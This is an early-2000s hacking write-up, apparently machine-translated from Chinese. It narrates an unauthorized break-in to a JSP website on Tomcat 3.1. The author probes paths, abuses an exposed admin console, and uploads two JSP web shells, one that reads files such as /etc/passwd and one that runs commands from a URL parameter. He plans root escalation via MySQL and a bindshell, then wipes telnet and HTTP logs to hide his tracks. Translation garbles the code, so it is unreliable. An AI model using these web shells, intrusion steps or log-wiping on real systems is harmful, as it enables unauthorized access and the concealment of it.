Web intrusion process JSP

Author: lovehacker

This article describes how to obtain FreeBSD 4.0 root permissions through web intrusion.
This article mainly aims at education. I hope that you will not use some methods and procedures in this article to endanger network security.
Author: lovehacker
Contact: lovehacker@263.net
Address: http://www.chinansl.com
The copyright is owned by the Information Technology Limited Liability Company of the League. Reprinting is permitted, but the integrity of the article must be maintained.

By chance, I saw a website with fresh and comfortable pages. The website is developed using JSP. Due to my personal interests, I decided to check the security of the system.

Telnet www.target.com 8080
GET/maid HTTP/1.1
[Enter]
[Enter]
The returned results are as follows:
HTTP/1.0 404 not found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-engine: Tomcat web server/3.1 (JSP 1.1; servlet 2.2; Java 1.2.2; Linux 2
. 2.12 i386; Java. Vendor = Blackdown Java-Linux Team)
Content-language: En
Content-Type: text/html
Status: 404

<H1> error: 404 <H2> location:/chinansl </H2> file not found <br>/chinansl
I got the name of the running webserver "Tomcat 3.1 ". I remember I once found this version of vulnerability and posted it to bugtrap.
Probably: you can exit the web directory through the ".." technology, so:
Http: // target: 8080/.../../% 00.jsp (NO)
Http: // target: 8080/file/index. jsp (NO)
Http: // target: 8080/index. jsp (NO)
Http: // target: 8080/index. jsp % 81 (NO)
Http: // target: 8080/index. js % 70 (NO)
Http: // target: 8080/index. jsp % 2581 (NO)
Http: // target: 8080/WEB-INF/(NO)
Well, try it! Tomcat 3.1 comes with a management tool that allows you to view directories and files on the web and add context. Try http: // target: 8080/admin/
The Administrator did not delete or prohibit access to this directory:-(error !!!!!
Then I clicked the "view all context" button to list the names of some files and directories under the web directory. I started to read it carefully for a while, I found a file upload component. Hey hey, write a JSP file and check it out.
I wrote this article about the time of several coffers:
<% @ Page import = "Java. Io. *" %>
<%
String file = request. getparameter ("file ");
String STR = "";
Fileinputstream FCM = NULL;
Datainputstream Dis = NULL;
Try {
FS = new fileinputstream (File );
Dis = new datainputstream (FCM );
While (true ){
Try {
STR = dis. Readline ();
} Catch (exception e ){}
If (STR = NULL) break;
Out. Print (STR + "<br> ");
}
} Catch (ioexception e ){}
%>
Upload the JSP file to the web directory of the other party through the uploaded component, and then:
Http: // target: 8080/upload/test. jsp? File =/etc/passwd
Hey, the password is out. I only read "/etc/passwd" and did not read "/etc/shadow", because at that time, webserver was generally started using the nobody identity. (Mistakes)
The next process is boring to guess the password and fail. Forget it. Now I have a shell. If I can't guess the password, I should use IE as my shell environment!
Write again:
<% @ Page import = "Java. Io. *" %>
<%
Try {
String cmd = request. getparameter ("cmd ");
Process child = runtime.getruntime(cmd.exe C (CMD );
Inputstream in = Child. getinputstream ();
Int C;
While (C = in. Read ())! =-1 ){
Out. Print (char) C );
}
In. Close ();
Try {
Child. waitfor ();
} Catch (interruptedexception e ){
E. printstacktrace ();
}
} Catch (ioexception e ){
System. Err. println (E );
}
%>
Then upload the JSP file through upload again. Hey, I have a shell now.
Http: // target: 8080/upload/CMD. jsp? Cmd = LS +-La +/
(I won't list it here)
How to get root? After some searches, I found that MySQL is installed in the system and I got the MySQL password from the source code of JSP :) to see what permissions MySQL is running:
Sqld "> http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux + | grep + mysqld
Display:
Root 87494 0.2 1.9 17300 4800 P0-s 28jun01. 72/usr/local/data/MySQL
Hey, there is a solution. The system runs MYSQL as root and I know the MySQL password. Now I can write a shell program to create a table, then put my data in the table, and then use "select... into OUTFILE; "to create a file on the system, so that the user can run my program while executing the Su. (Do you still remember that apache.org was intruded? Hacker uses this method ).
Then, I will upload a program such as bindshell, run the program, and obtain the nobody permission. Then, I will use the setuid shell created by Su root to make myself the root.
Hey, it's a good way. I'm proud of my ideas ......

Next thing, I almost didn't vomit blood:
I typed A: http: // target: 8080/upload/CMD. jsp? Cmd = ID
Display:
Uid = 0 (Root) gid = 0 (XXX) groups = 0 (XXX), 2 (XXX), 3 (XXX), 4 (XXX), 5 (XXX ), 20 (XXX), 31 (XXX)
Kao: My web shell is root. I have actually served the Administrator and myself. It's been a long time, ah!
Http: // target: 8080/upload/CMD. jsp? Cmd = Ps + Aux
It was run as root (not listed)

The remaining things:
1. delete my Telnet records.
2. Delete HTTP logs.
To clear logs, I used cat XXX | grep-V "ip"> temp to overwrite the modified log files.
I didn't change his page, because I am not a hacker, not a hacker, but a network security enthusiast. So, send an email to system admin!
Of course, by the way, I mentioned in my letter that we would be very happy if it was needed to provide him with security services!